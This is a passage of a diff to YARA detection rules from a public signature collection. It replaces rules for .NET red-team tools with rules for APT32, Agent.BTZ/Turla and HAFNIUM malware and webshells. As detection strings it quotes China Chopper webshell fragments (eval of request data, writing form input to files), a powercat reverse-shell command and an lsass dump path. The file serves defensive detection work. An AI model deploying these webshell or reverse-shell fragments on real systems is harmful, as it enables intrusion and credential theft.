+		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
+		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
+		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$typelibguid0lo = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii wide
-		$typelibguid0up = "98CB495F-4D47-4722-B08F-CEFAB2282B18" ascii wide
+		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
+		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
+		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
+		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
+		$s1 = "%sc=%s" fullword ascii
+		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
+		$s3 = "NETIO.SYS" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and filesize < 1000KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript_Languagemodebreakout : FILE
+
+rule SIGNATURE_BASE_EXT_APT32_Goopdate_Installer
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c8cf79f-8e69-5293-b27a-1f8593061627"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4827-L4841"
+		description = "Detects APT32 installer side-loaded with goopdate.dll"
+		author = "Facebook"
+		id = "08f3cbda-ccb7-517a-b205-5f71de26c735"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt32.yar#L3-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f1651b896e62ee669e233403a9fb435adfb4f8965b6432452a1bb72b69bfe2c"
+		hash = "69730f2c2bb9668a17f8dfa1f1523e0e1e997ba98f027ce98f5cbaa869347383"
+		logic_hash = "1dcb3009c5c19ff4e54d82d3a4b99b3431e78664f1660522a781e815d96958c4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii wide
-		$typelibguid0up = "DEADB33F-FA94-41B5-813D-E72D8677A0CF" ascii wide
+		$s0 = { 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? }
+		$s1 = "GetProcAddress"
+		$s2 = { 8B 4D FC ?? ?? 0F B6 51 0C ?? ?? 8B 4D F0 0F B6 1C 01 33 DA }
+		$s3 = "FindNextFileW"
+		$s4 = "Process32NextW"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(pe.is_64bit ( ) or pe.is_32bit ( ) ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpermission : FILE
+rule SIGNATURE_BASE_EXT_APT32_Osx_Backdoor_Loader : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d5027f51-f3ca-53cd-96d7-c355b5c2e6fa"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/mitchmoser/SharPermission"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4843-L4857"
+		description = "Detects APT32 backdoor loader on OSX"
+		author = "Facebook"
+		id = "ac313bd8-bf15-5b72-b651-35015f71dd90"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt32.yar#L22-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c22923057099a6a796cab36838728c0ae51a1c2a6f06c4a0c07415baadac6978"
+		hash = "768510fa9eb807bba9c3dcb3c7f87b771e20fa3d81247539e9ea4349205e39eb"
+		logic_hash = "26964f95a9298b838e06fb9d7f739c8b87a976d8da7fb08416e952d26e84b84e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii wide
-		$typelibguid0up = "84D2B661-3267-49C8-9F51-8F72F21AEA47" ascii wide
+		$a1 = { 00 D2 44 8A 04 0F 44 88 C0 C0 E8 07 08 D0 88 44 0F FF 48 FF C1 48 83 F9 10 44 88 C2 }
+		$a2 = { 41 0F 10 04 07 0F 57 84 05 A0 FE FF FF 41 0F 11 04 07 48 83 C0 10 48 83 F8 10 75 }
+		$e1 = { CA CF 3E F2 DA 43 E6 D1  D5 6C D4 23 3A AE F1 B2 }
+		$e2 = "MlkHVdRbOkra9s+G65MAoLga340t3+zj/u8LPfP3hig="
+		$e3 = { 5A 69 98 0E 6C 4B 5C 69  7E 19 34 3B C3 07 CA 13 }
+		$e4 = "1Sib4HfPuRQjpxIpECnxxTPiu3FXOFAHMx/+9MEVv9M+h1ngV7T5WUP3b0zsg0Qd"
+		$e5 = "_ArchaeologistCodeine"
+		$e6 = "_PlayerAberadurtheIncomprehensible"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(( uint32( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedface ) or ( uint32( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xfeedfacf ) ) and ( 2 of ( $e* ) or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Registrystrikesback : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1577ed24-0e17-54f9-bc29-bb209acf9645"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4859-L4873"
+		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8032616-2a54-5107-b330-65fcc84b866e"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L13-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa228e65f6bada1811c83528af8119b5336ebbc2381d5edef35c749ddff02487"
+		logic_hash = "ea430b2888b487a5c7a91b73e8a7893b53d67e8ac95ae85fe9d15c633b2ee660"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
+		hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
 
 	strings:
-		$typelibguid0lo = "90ebd469-d780-4431-9bd8-014b00057665" ascii wide
-		$typelibguid0up = "90EBD469-D780-4431-9BD8-014B00057665" ascii wide
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them and pe.exports ( "Entry" ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Clonevault : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3340a095-d926-5c85-b7ed-03151712538d"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/CloneVault"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4875-L4889"
+		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2777443d-6f63-5948-855a-e064a6e0310f"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L29-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b8a2be082e2444ac9bfa9dd820e08de147c8dbfc0573e7126bde39f18b917bfd"
+		logic_hash = "41960e6deaee5d087b0eeee515b323cef8ead45ad305d053f6eb1897e204b003"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "73db4295c5b29958c5d93c20be9482c1efffc89fc4e5c8ba59ac9425a4657a88"
+		hash2 = "380b0353ba8cd33da8c5e5b95e3e032e83193019e73c71875b58ec1ed389bdac"
+		hash3 = "f27e9bba6a2635731845b4334b807c0e4f57d3b790cecdc77d8fef50629f51a2"
 
 	strings:
-		$typelibguid0lo = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii wide
-		$typelibguid0up = "0A344F52-6780-4D10-9A4A-CB9439F9D3DE" ascii wide
+		$s1 = { 38 21 38 2C 38 37 38 42 38 4D 38 58 38 63 38 6E
+               38 79 38 84 38 8F 38 9A 38 A5 38 B0 38 BB 38 C6
+               38 D1 38 DC 38 E7 38 F2 38 FD 38 08 39 13 39 1E
+               39 29 39 34 39 3F 39 4A 39 55 39 60 39 6B 39 76
+               39 81 39 8C 39 97 39 A2 39 AD 39 B8 39 C3 39 CE
+               39 D9 39 E4 39 EF 39 FA 39 05 3A 10 3A 1B 3A 26
+               3A 31 3A 3C 3A 47 3A 52 3A 5D 3A 68 3A 73 3A 7E
+               3A 89 3A 94 3A 9F 3A AA 3A B5 3A C0 3A CB 3A D6
+               3A E1 3A EC 3A F7 3A }
+		$s2 = "activeds.dll" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.imphash ( ) == "09b7c73fbe5529e6de7137e3e8268b7b"
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Donut : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Aug17 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "564dfd0a-af9b-505f-a6f0-de2a5c5c63f3"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/TheWover/donut"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4891-L4911"
+		description = "Detects Agent.BTZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "31804208-3edb-554b-8820-e682db647435"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L54-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cae0d358cda5330f69162aa3116d544f9ba16d37dcbcbf33f9938360b861b89a"
+		logic_hash = "cf4fc7820d516cf0322bf25460301b4d04f914814fc2a069164814dd4e1158be"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
+		hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
+		hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
 
 	strings:
-		$typelibguid0lo = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii wide
-		$typelibguid0up = "98CA74C7-A074-434D-9772-75896E73CEAA" ascii wide
-		$typelibguid1lo = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii wide
-		$typelibguid1up = "3C9A6B88-BED2-4BA8-964C-77EC29BF1846" ascii wide
-		$typelibguid2lo = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii wide
-		$typelibguid2up = "4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2" ascii wide
-		$typelibguid3lo = "361c69f5-7885-4931-949a-b91eeab170e3" ascii wide
-		$typelibguid3up = "361C69F5-7885-4931-949A-B91EEAB170E3" ascii wide
+		$s1 = "stdole2.tlb" fullword ascii
+		$s2 = "UnInstallW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them and pe.exports ( "Entry" ) and pe.exports ( "InstallW" ) and pe.exports ( "UnInstallW" ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphandler : FILE
+
+rule SIGNATURE_BASE_APT_Turla_Agent_BTZ_Gen_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b71198a9-4d00-5d75-bc36-7c40655c84a3"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/jfmaes/SharpHandler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4913-L4929"
+		description = "Detects Turla Agent.BTZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5e1dd3d-4f03-5f79-898b-e612d2758b60"
+		date = "2018-06-16"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_agent_btz.yar#L75-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70e8c495c8a340e0afaa38faf0eb96101854a4dc51c29c571d9b74751aec91fd"
-		score = 75
+		logic_hash = "8616d95e683f213916f06a7bf672ced90b2fa55cb4331176021614b4f0b03aed"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615"
 
 	strings:
-		$typelibguid0lo = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii wide
-		$typelibguid0up = "46E39AED-0CFF-47C6-8A63-6826F147D7BD" ascii wide
-		$typelibguid1lo = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii wide
-		$typelibguid1up = "11DC83C6-8186-4887-B228-9DC4FD281A23" ascii wide
+		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
+		$s1 = "release mutex - %u (%u)(%u)" fullword ascii
+		$s2 = "\\system32\\win.com" ascii
+		$s3 = "Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
+		$s4 = "MakeFile Error(%d) copy file to temp file %s" fullword ascii
+		$s5 = "%s%%s08x.tmp" fullword ascii
+		$s6 = "Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
+		$s7 = "Mutex_Log" fullword ascii
+		$s8 = "%s\\system32\\winview.ocx" fullword ascii
+		$s9 = "Microsoft(R) Windows (R) Operating System" fullword wide
+		$s10 = "Error: pos(%d) > CmdSize(%d)" fullword ascii
+		$s11 = "\\win.com" ascii
+		$s12 = "Error(%d) run %s " fullword ascii
+		$s13 = "%02d.%02d.%04d Log begin:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "9d0d6daa47d6e6f2d80eb05405944f87" or ( pe.exports ( "Entry" ) and pe.exports ( "InstallM" ) and pe.exports ( "InstallS" ) ) or $x1 or 3 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Driver_Template : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Embedded_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "539f88c5-e779-55e0-98df-299a9068de9b"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FuzzySecurity/Driver-Template"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4931-L4945"
+		description = "Detects ASP webshells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7cf7db9d-8f8a-51db-a0e6-84748e8f9e1f"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "533cefcc86ff8eff8757041df8acf2a9c484d265b6aa9516c12adb606d6f71cb"
-		score = 75
+		logic_hash = "4a8b4cea6f53dad9771cb694ec55f305f04dfdbd8e663154cad672ca414c138c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii wide
-		$typelibguid0up = "BDB79AD6-639F-4DC2-8B8A-CD9107DA3D69" ascii wide
+		$s1 = "<script runat=\"server\">" nocase
+		$s2 = "new System.IO.StreamWriter(Request.Form["
+		$s3 = ".Write(Request.Form["
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nashavm : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Secchecker_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3abbf636-01f4-547a-98c0-d7bfec07e31a"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/Mrakovic-ORG/NashaVM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4947-L4961"
+		description = "Detects HAFNIUM SecChecker webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "73db3d78-7ece-53be-9efb-d19801993d5e"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/markus_neis/status/1367794681237667840"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L18-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4046e8183ee2bcf95893f9a438f13aec9afa99e252029888830a0bf81dac2f6f"
+		logic_hash = "e0e4df860bdde7d5c277f596535c493d926095be6f46f6ba41b6177afbfc5cd9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0"
 
 	strings:
-		$typelibguid0lo = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii wide
-		$typelibguid0up = "F9E63498-6E92-4AFD-8C13-4F63A3D964C3" ascii wide
+		$x1 = "<%if(System.IO.File.Exists(\"c:\\\\program files (x86)\\\\fireeye\\\\xagt.exe" ascii
+		$x2 = "\\csfalconservice.exe\")){Response.Write( \"3\");}%></head>" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of them or 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsqlpwn : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensic_Artefacts_Mar21_1
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b533d61a-8693-5c3c-8b31-2117262cad4e"
-		date = "2022-11-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/lefayjey/SharpSQLPwn.git"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4963-L4977"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "872822b0-34d9-5ae4-a532-6a8786494fa9"
+		date = "2021-03-02"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L35-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2015c80084199bfedebe1591f02ffad5f31218351148d8087789b82523a39baa"
+		logic_hash = "eb86595956092506c2e29373faaf39a3987f9feed36a53b191bedd498db05cbb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "c442ea6a-9aa1-4d9c-9c9d-7560a327089c" ascii wide
-		$typelibguid0up = "C442EA6A-9AA1-4D9C-9C9D-7560A327089C" ascii wide
+		$s1 = "lsass.exe C:\\windows\\temp\\lsass" ascii wide fullword
+		$s2 = "c:\\ProgramData\\it.zip" ascii wide fullword
+		$s3 = "powercat.ps1'); powercat -c" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Group3R : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Chopper_Webshell : APT HAFNIUM WEBSHELL FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0571d71e-50ca-5c1b-b750-34acc2d06687"
-		date = "2022-11-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/Group3r/Group3r.git"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4979-L4995"
+		description = "Detects Chopper WebShell Injection Variant (not only Hafnium related)"
+		author = "Markus Neis,Swisscom"
+		id = "25dcf166-4aea-5680-b161-c5fc8d74b987"
+		date = "2021-03-05"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L50-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ff62920395c8db7544ba0fb0dc0833892f89d0f8908bc3eee909ad1e012c84c"
+		logic_hash = "c185a8da2a18fa59a8eeb36dbd95ba12c9c61717efc5f2d19d2d5b27ee243f2b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, HAFNIUM, WEBSHELL, FILE"
 
 	strings:
-		$typelibguid0lo = "868a6c76-c903-4a94-96fd-a2c6ba75691c" ascii wide
-		$typelibguid0up = "868A6C76-C903-4A94-96FD-A2C6BA75691C" ascii wide
-		$typelibguid1lo = "caa7ab97-f83b-432c-8f9c-c5f1530f59f7" ascii wide
-		$typelibguid1up = "CAA7AB97-F83B-432C-8F9C-C5F1530F59F7" ascii wide
+		$x1 = "runat=\"server\">" nocase
+		$s1 = "<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request" nocase
+		$s2 = "protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[\"p\"] , false, Encoding.Default);sw.Write(Request.Form[\"f\"]);"
+		$s3 = "<script language=\"JScript\" runat=\"server\"> function Page_Load(){eval (Request[\"" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and $x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenstomp : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_Tiny_Webshell : APT HAFNIUM WEBSHELL FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
